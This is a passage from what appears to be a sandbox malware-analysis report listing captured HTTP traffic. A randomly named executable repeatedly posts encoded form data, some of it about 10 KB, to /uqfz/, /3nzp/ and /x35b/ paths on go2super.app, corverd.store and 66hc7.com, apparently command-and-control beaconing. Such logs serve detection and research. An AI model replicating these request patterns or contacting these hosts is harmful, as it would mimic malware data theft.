                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.go2super.app
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 199
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.go2super.app/uqfz/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Raw: 53 68 3d 72 65 38 78 66 47 6f 6f 46 4b 4f 75 4d 47 55 71 71 69 32 6d 37 6b 62 32 69 74 30 68 44 62 45 77 44 76 55 4f 64 48 78 46 36 72 62 33 57 55 37 2f 4f 6f 67 6d 34 63 48 30 65 64 6e 6d 30 69 67 2b 75 41 58 73 6a 58 49 77 34 51 54 43 66 64 46 68 37 69 4c 2b 64 77 4a 67 54 38 54 5a 75 45 49 5a 51 6a 30 6e 76 4c 62 55 36 30 6b 77 5a 51 5a 67 48 61 6e 4d 37 33 65 44 4f 31 66 4f 4b 30 31 62 67 48 67 2f 52 43 34 6c 41 31 36 71 6b 33 30 47 37 62 4f 54 74 50 6b 33 34 72 61 75 35 57 2b 4a 35 66 63 7a 65 37 4f 35 46 4a 54 48 31 37 51 64 43 31 39 79 45 30 50 4a 73 73 32 38 55 78 6e 65 6e 77 3d 3d
                                                                                                        Data Ascii: Sh=re8xfGooFKOuMGUqqi2m7kb2it0hDbEwDvUOdHxF6rb3WU7/Oogm4cH0ednm0ig+uAXsjXIw4QTCfdFh7iL+dwJgT8TZuEIZQj0nvLbU60kwZQZgHanM73eDO1fOK01bgHg/RC4lA16qk30G7bOTtPk34rau5W+J5fcze7O5FJTH17QdC19yE0PJss28Uxnenw==


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        6192.168.2.4498333.33.130.190805856C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 10, 2024 14:46:37.680917978 CEST768OUTPOST /uqfz/ HTTP/1.1
                                                                                                        Host: www.go2super.app
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.go2super.app
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 219
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.go2super.app/uqfz/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Raw: 53 68 3d 72 65 38 78 66 47 6f 6f 46 4b 4f 75 4d 6d 6b 71 6f 44 32 6d 2b 45 62 78 74 4e 30 68 49 37 45 30 44 76 6f 4f 64 43 49 41 36 34 2f 33 58 31 4c 2f 50 71 59 6d 37 63 48 30 47 74 6e 6a 77 69 67 31 75 41 54 6b 6a 56 63 77 34 51 48 43 66 59 70 68 37 54 4c 2f 63 67 4a 69 47 73 54 62 68 6b 49 5a 51 6a 30 6e 76 50 4c 2b 36 30 38 77 5a 67 70 67 56 4c 6e 54 31 58 65 41 4a 31 66 4f 41 6b 31 66 67 48 67 4e 52 44 30 50 41 77 32 71 6b 31 73 47 38 4b 4f 63 6e 50 6c 2b 31 4c 62 61 77 48 76 44 30 64 6f 39 41 6f 53 57 61 37 48 4b 77 39 42 48 54 45 63 6c 57 30 72 36 78 72 2f 49 5a 79 61 58 38 78 57 2b 55 44 51 6d 6c 64 38 6f 42 32 6d 2f 4e 34 65 5a 77 67 73 3d
                                                                                                        Data Ascii: Sh=re8xfGooFKOuMmkqoD2m+EbxtN0hI7E0DvoOdCIA64/3X1L/PqYm7cH0Gtnjwig1uATkjVcw4QHCfYph7TL/cgJiGsTbhkIZQj0nvPL+608wZgpgVLnT1XeAJ1fOAk1fgHgNRD0PAw2qk1sG8KOcnPl+1LbawHvD0do9AoSWa7HKw9BHTEclW0r6xr/IZyaX8xW+UDQmld8oB2m/N4eZwgs=


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        7192.168.2.4498453.33.130.190805856C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 10, 2024 14:46:40.225322962 CEST10850OUTPOST /uqfz/ HTTP/1.1
                                                                                                        Host: www.go2super.app
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.go2super.app
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 10299
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.go2super.app/uqfz/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Raw: 53 68 3d 72 65 38 78 66 47 6f 6f 46 4b 4f 75 4d 6d 6b 71 6f 44 32 6d 2b 45 62 78 74 4e 30 68 49 37 45 30 44 76 6f 4f 64 43 49 41 36 34 33 33 57 47 44 2f 50 4c 59 6d 36 63 48 30 50 4e 6e 69 77 69 67 6b 75 45 2f 67 6a 56 41 67 34 53 2f 43 65 36 68 68 39 6e 58 2f 4a 77 4a 69 5a 63 54 65 75 45 49 70 51 6a 6c 75 76 4c 58 2b 36 30 38 77 5a 6a 78 67 57 61 6e 54 34 33 65 44 4f 31 66 38 4b 30 31 37 67 48 35 36 52 44 77 31 42 44 2b 71 6a 56 38 47 36 34 57 63 76 50 6c 77 30 4c 62 43 77 48 6a 41 30 64 31 43 41 72 4f 38 61 35 62 4b 77 37 77 6b 44 57 5a 36 55 46 69 68 74 5a 6e 49 58 41 4b 51 30 53 6d 41 58 69 45 45 34 50 34 49 4d 47 6e 4b 65 49 71 6f 68 31 6b 57 4e 43 59 75 77 78 74 5a 48 56 77 6f 69 42 47 48 77 52 48 4d 43 37 36 67 6c 2b 43 70 77 4d 2f 33 33 73 6e 6a 6d 39 48 44 73 4f 57 6c 6f 7a 6f 2f 52 63 58 76 31 74 6b 53 6c 4e 73 45 4e 57 4f 58 4a 31 34 4e 64 4d 79 48 50 6d 63 6d 47 4c 41 6d 62 63 54 69 70 64 48 30 55 70 52 67 6a 45 61 79 63 6f 71 4c 53 73 30 72 73 53 6f 63 4a 62 6a 48 48 52 39 37 2f 56 4e [TRUNCATED]
                                                                                                        Data Ascii: Sh=re8xfGooFKOuMmkqoD2m+EbxtN0hI7E0DvoOdCIA6433WGD/PLYm6cH0PNniwigkuE/gjVAg4S/Ce6hh9nX/JwJiZcTeuEIpQjluvLX+608wZjxgWanT43eDO1f8K017gH56RDw1BD+qjV8G64WcvPlw0LbCwHjA0d1CArO8a5bKw7wkDWZ6UFihtZnIXAKQ0SmAXiEE4P4IMGnKeIqoh1kWNCYuwxtZHVwoiBGHwRHMC76gl+CpwM/33snjm9HDsOWlozo/RcXv1tkSlNsENWOXJ14NdMyHPmcmGLAmbcTipdH0UpRgjEaycoqLSs0rsSocJbjHHR97/VNUHOHfhOsA/R3oKWdA09tunx7LxoN27C+cldBjgoGE9g9yAwA0W8eyva47Fhuf7Ri4de73leZbBICZPIdh+pHR+JaFUowPkYHg4j89nXu2K/zruIZc4lz9ojNYpXp6mwip6nxlYB/1pfYSWdG/cRkkVGY8fPeZy3CvPGTfcGSTPt6nSoGyWQvKJW3i0t3aPmD2aqSboT6uG0Fd9CnT5mf/iB1VzRcG66aCYWroDbQxADVSrcbvC7pufuI2hABVRg8wD8CT/8AYpsomCwTkRrlyzTINrSKx2s+QAos/tkNH8EFiZg6GWtG2XDYxWASHaMATV3nwJYV+hgMryXKzmBU97GUUvXd/uQ8Pq1k7f/Ve/phRdy3DvWMr8Z+XEezR0lZytdRDXHquaFN/SMsI/zqX7cLh2VuQELL3rAvx59amvvCtRA0EQLlmwvNvNI8lCvDyskdYBk9ikjQvfGoiudfzArb5PVwVu4d8c3Tve0YV9pUrig7vbAB1XskYuLBf+AbTe8ZBVmkX/Ry0zEIWiAqXX0xJbh/zc13GWDxFcpadY9CYuCOBTv0kXGXwnG6/BhFyNNbqdgm/vVRCXnOod6Rn3stWiLRrEblrtOHjtBANVitxdtGMOPAp6fD1zh+iX3z51tz6OCMPo/89U9HoD57/3oSSkexC4dpNT [TRUNCATED]


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        8192.168.2.4498603.33.130.190805856C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 10, 2024 14:46:42.764571905 CEST485OUTGET /uqfz/?Sh=mcURcygGZpi8BUAEri2LzCX8yukoHIUSB9ATV0AA66/eXSD2DbYq2fDOBcTf2y0GiA7pk1o8xA7eBrRh6Cv9Vx9YWZ7NmBQtUSw3jvSSlGdRHD15Z6r2w2o=&f6SpQ=_n84nZ4HGta HTTP/1.1
                                                                                                        Host: www.go2super.app
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Oct 10, 2024 14:46:44.155246973 CEST396INHTTP/1.1 200 OK
                                                                                                        Server: openresty
                                                                                                        Date: Thu, 10 Oct 2024 12:46:44 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 256
                                                                                                        Connection: close
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 53 68 3d 6d 63 55 52 63 79 67 47 5a 70 69 38 42 55 41 45 72 69 32 4c 7a 43 58 38 79 75 6b 6f 48 49 55 53 42 39 41 54 56 30 41 41 36 36 2f 65 58 53 44 32 44 62 59 71 32 66 44 4f 42 63 54 66 32 79 30 47 69 41 37 70 6b 31 6f 38 78 41 37 65 42 72 52 68 36 43 76 39 56 78 39 59 57 5a 37 4e 6d 42 51 74 55 53 77 33 6a 76 53 53 6c 47 64 52 48 44 31 35 5a 36 72 32 77 32 6f 3d 26 66 36 53 70 51 3d 5f 6e 38 34 6e 5a 34 48 47 74 61 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Sh=mcURcygGZpi8BUAEri2LzCX8yukoHIUSB9ATV0AA66/eXSD2DbYq2fDOBcTf2y0GiA7pk1o8xA7eBrRh6Cv9Vx9YWZ7NmBQtUSw3jvSSlGdRHD15Z6r2w2o=&f6SpQ=_n84nZ4HGta"}</script></head></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        9192.168.2.44990181.88.48.71805856C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 10, 2024 14:46:49.258930922 CEST751OUTPOST /3nzp/ HTTP/1.1
                                                                                                        Host: www.corverd.store
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.corverd.store
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 199
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.corverd.store/3nzp/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Raw: 53 68 3d 43 69 4e 45 70 7a 69 4d 59 58 76 53 35 77 2f 65 6b 2f 49 71 79 64 30 5a 71 56 50 6e 74 46 76 67 35 4a 47 4e 67 47 4f 57 68 69 35 6c 71 39 46 56 45 30 70 36 6b 43 34 37 33 52 63 72 69 6e 42 4c 50 31 6f 4b 71 4a 2b 63 66 50 44 62 42 33 45 30 41 69 6c 44 79 63 5a 70 32 76 54 6a 4b 64 70 44 62 7a 65 67 6d 69 54 4d 62 31 70 55 74 38 47 42 76 61 79 32 41 78 51 75 47 36 4a 32 76 39 2b 61 58 31 31 2f 50 39 6c 61 53 6b 6f 53 74 64 6f 46 6f 33 64 48 32 68 65 6e 79 75 46 61 62 57 2f 2f 75 37 2b 4c 4c 39 66 56 4d 2f 75 6c 43 6c 4c 4f 56 47 6f 73 42 32 6c 69 58 38 62 32 58 52 70 57 58 67 3d 3d
                                                                                                        Data Ascii: Sh=CiNEpziMYXvS5w/ek/Iqyd0ZqVPntFvg5JGNgGOWhi5lq9FVE0p6kC473RcrinBLP1oKqJ+cfPDbB3E0AilDycZp2vTjKdpDbzegmiTMb1pUt8GBvay2AxQuG6J2v9+aX11/P9laSkoStdoFo3dH2henyuFabW//u7+LL9fVM/ulClLOVGosB2liX8b2XRpWXg==
                                                                                                        Oct 10, 2024 14:46:49.954166889 CEST367INHTTP/1.1 404 Not Found
                                                                                                        Date: Thu, 10 Oct 2024 12:46:49 GMT
                                                                                                        Server: Apache
                                                                                                        Content-Length: 203
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 33 6e 7a 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3nzp/ was not found on this server.</p></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        10192.168.2.44992281.88.48.71805856C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 10, 2024 14:46:51.800765038 CEST771OUTPOST /3nzp/ HTTP/1.1
                                                                                                        Host: www.corverd.store
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.corverd.store
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 219
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.corverd.store/3nzp/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Raw: 53 68 3d 43 69 4e 45 70 7a 69 4d 59 58 76 53 35 51 50 65 6f 34 63 71 33 39 30 61 76 56 50 6e 34 56 75 6e 35 4a 43 4e 67 44 69 47 68 30 70 6c 71 5a 4a 56 57 32 42 36 6c 43 34 37 6c 78 64 68 73 48 42 51 50 31 6c 33 71 49 79 63 66 50 58 62 42 79 34 30 56 42 4e 43 39 73 5a 6e 39 50 54 68 48 39 70 44 62 7a 65 67 6d 68 76 32 62 31 78 55 74 50 65 42 75 37 79 70 44 78 51 76 4f 61 4a 32 72 39 2b 47 58 31 30 59 50 2f 42 30 53 6e 41 53 74 63 30 46 72 6d 64 41 34 52 65 62 38 4f 45 58 66 6e 53 7a 73 62 7a 2f 4f 64 4f 75 54 38 4c 4a 48 6a 61 55 45 33 4a 37 54 32 42 52 4b 37 53 43 61 53 55 66 4d 6c 63 52 63 6b 45 45 6e 6d 47 42 35 52 77 62 41 72 48 6c 58 66 6b 3d
                                                                                                        Data Ascii: Sh=CiNEpziMYXvS5QPeo4cq390avVPn4Vun5JCNgDiGh0plqZJVW2B6lC47lxdhsHBQP1l3qIycfPXbBy40VBNC9sZn9PThH9pDbzegmhv2b1xUtPeBu7ypDxQvOaJ2r9+GX10YP/B0SnAStc0FrmdA4Reb8OEXfnSzsbz/OdOuT8LJHjaUE3J7T2BRK7SCaSUfMlcRckEEnmGB5RwbArHlXfk=
                                                                                                        Oct 10, 2024 14:46:52.465985060 CEST367INHTTP/1.1 404 Not Found
                                                                                                        Date: Thu, 10 Oct 2024 12:46:52 GMT
                                                                                                        Server: Apache
                                                                                                        Content-Length: 203
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 33 6e 7a 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3nzp/ was not found on this server.</p></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        11192.168.2.44993881.88.48.71805856C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 10, 2024 14:46:54.347877026 CEST10853OUTPOST /3nzp/ HTTP/1.1
                                                                                                        Host: www.corverd.store
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.corverd.store
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 10299
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.corverd.store/3nzp/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Raw: 53 68 3d 43 69 4e 45 70 7a 69 4d 59 58 76 53 35 51 50 65 6f 34 63 71 33 39 30 61 76 56 50 6e 34 56 75 6e 35 4a 43 4e 67 44 69 47 68 30 68 6c 71 4b 42 56 45 52 31 36 69 43 34 37 6d 78 64 69 73 48 42 64 50 32 56 37 71 49 75 6d 66 4b 54 62 54 41 41 30 45 51 4e 43 71 38 5a 6e 67 66 54 38 4b 64 6f 4c 62 7a 4f 6b 6d 68 2f 32 62 31 78 55 74 4f 75 42 6e 4b 79 70 46 78 51 75 47 36 4a 79 76 39 2b 36 58 31 74 6e 50 2f 46 4b 53 58 67 53 74 38 6b 46 6e 30 31 41 36 78 65 5a 78 75 46 45 66 6e 66 78 73 62 2f 46 4f 65 54 6d 54 2f 58 4a 46 6b 2f 78 5a 56 52 6d 45 58 42 62 49 70 32 59 61 78 38 67 58 6c 67 2f 50 31 6f 37 6e 33 65 7a 36 79 63 66 53 4b 66 42 4a 6f 63 5a 45 44 53 78 77 46 4b 38 70 73 33 70 67 4b 41 62 63 4f 5a 71 4f 58 69 67 62 59 52 50 64 36 32 66 70 42 38 33 4c 52 7a 4d 39 55 72 57 6b 47 31 44 76 45 51 35 71 39 49 44 6d 4d 58 36 6b 68 55 37 6b 6c 76 54 53 4f 54 66 43 79 6b 52 35 57 43 64 42 70 6c 35 31 44 6f 54 70 73 6a 48 65 37 50 53 47 4a 4b 79 35 4e 79 76 41 6a 50 39 51 59 63 52 4c 55 50 4e 33 6a 35 [TRUNCATED]
                                                                                                        Data Ascii: Sh=CiNEpziMYXvS5QPeo4cq390avVPn4Vun5JCNgDiGh0hlqKBVER16iC47mxdisHBdP2V7qIumfKTbTAA0EQNCq8ZngfT8KdoLbzOkmh/2b1xUtOuBnKypFxQuG6Jyv9+6X1tnP/FKSXgSt8kFn01A6xeZxuFEfnfxsb/FOeTmT/XJFk/xZVRmEXBbIp2Yax8gXlg/P1o7n3ez6ycfSKfBJocZEDSxwFK8ps3pgKAbcOZqOXigbYRPd62fpB83LRzM9UrWkG1DvEQ5q9IDmMX6khU7klvTSOTfCykR5WCdBpl51DoTpsjHe7PSGJKy5NyvAjP9QYcRLUPN3j5xFLwX9zxBfcStw1RSQLv6aCTk86ekrF9vAPgwBbnXbsZd1DL2sgUn6Bi+4iCca/dT5pszZsoFK/t5TDKUKdfhB3MrOI4uMNJ+bEnHrYp58yJYDcpDM0FbRPhiqULaS+0C7RRrBbIHceWP6uCvbe8xceCcVvC6Pl+Grr3BytWAkVBr4wehhCZL1Ha4rKIKmXZtKrtBUTgrfGuWDWVHeZXbX596MwwqVcglR8zo1ThuZ13uIM/zR4joxv9tKN06/TL+zv0tQ3d/PeqN5yU7lcKeDfhRHRCjqZU5zaYFNfD+eOS4+o9BgMnWDK1AtsNDPj3GWlnMpsIxHmLlAAJ0tO5dgRVew6mInZCrGx8UxqFlascALMgJfIEHvYh/mKMdJS9f8JfnXqzc4hZBmkHhRAysU2rsLPHe4bIqYlHhJkowF8rdt9mnaXgrWnKI3K8WLYOfvY5c1ZzDB39vHh2XQMw35sCRgb0cb/Lq7NYr06mmb1ETknhFbQWILqSye3TwAorGuMvQGB1y5RtjavpD+0HEncgMrmaIEAli1gRdke+9BKHDCWgx/FqS1xXxvf85CfEQZA/ovWz/YW0LHGMBaVhi4QRHbvM5fOLA9MfgIUwYRh75s8TjZKJl8vv8K7YBK+zlmjUjsmeFZtFNT1CYwcVftRkvKyEGBY6nc [TRUNCATED]
                                                                                                        Oct 10, 2024 14:46:55.113912106 CEST367INHTTP/1.1 404 Not Found
                                                                                                        Date: Thu, 10 Oct 2024 12:46:54 GMT
                                                                                                        Server: Apache
                                                                                                        Content-Length: 203
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 33 6e 7a 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3nzp/ was not found on this server.</p></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        12192.168.2.44995481.88.48.71805856C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 10, 2024 14:46:56.889822006 CEST486OUTGET /3nzp/?Sh=PglkqFvbbyb87SegldF7644R50nw13706su3sEKMhHJ419d8UFlSgmN6uEUbiABfJzkrsK6wePLWTRJFKAJP15xlx/rUOqsRMQGimgyXa3wd/uL7sq2sISc=&f6SpQ=_n84nZ4HGta HTTP/1.1
                                                                                                        Host: www.corverd.store
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Oct 10, 2024 14:46:57.568619967 CEST367INHTTP/1.1 404 Not Found
                                                                                                        Date: Thu, 10 Oct 2024 12:46:57 GMT
                                                                                                        Server: Apache
                                                                                                        Content-Length: 203
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 33 6e 7a 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3nzp/ was not found on this server.</p></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        13192.168.2.449993162.209.189.212805856C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 10, 2024 14:47:03.468956947 CEST739OUTPOST /x35b/ HTTP/1.1
                                                                                                        Host: www.66hc7.com
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.66hc7.com
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 199
